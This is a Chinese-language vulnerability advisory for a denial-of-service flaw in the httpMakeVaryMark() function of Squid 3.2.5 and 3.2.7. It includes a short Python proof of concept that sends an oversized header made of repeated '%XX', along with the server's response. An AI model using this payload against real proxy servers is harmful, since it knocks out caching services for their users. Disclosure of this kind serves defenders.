发布日期：2013-03-05
更新日期：2013-03-07

受影响系统：

Squid Squid 3.2.7
Squid Squid 3.2.5

描述：

---

BUGTRAQ  ID: 58319

Squid是一个高效的Web缓存及代理程序。

Squid 3.2.5、3.2.7在函数'httpMakeVaryMark()'的实现上存在安全漏洞，成功利用后可允许远程攻击者造成Squid内存异常，触发拒绝服务。

<*来源：tytusromekiatomek （tytusromekiatomek@hushmail.com）
  
  链接：http://seclists.org/fulldisclosure/2013/Mar/62
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

tytusromekiatomek （tytusromekiatomek@hushmail.com）提供了如下测试方法：

Request
  -- cut --
  #!/usr/bin/env python
  print 'GET /index.html HTTP/1.1'
  print 'Host: localhost'
  print 'X-HEADSHOT: ' + '%XX' * 19000
  print '\r\n\r\n'
  -- cut --

  Response
  -- cut --
  HTTP/1.1 200 OK
  Vary: X-HEADSHOT
  -- cut --

建议：

---

厂商补丁：

Squid
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.squid-cache.org/Advisories/

浏览次数：4010
严重程度：0（网友投票）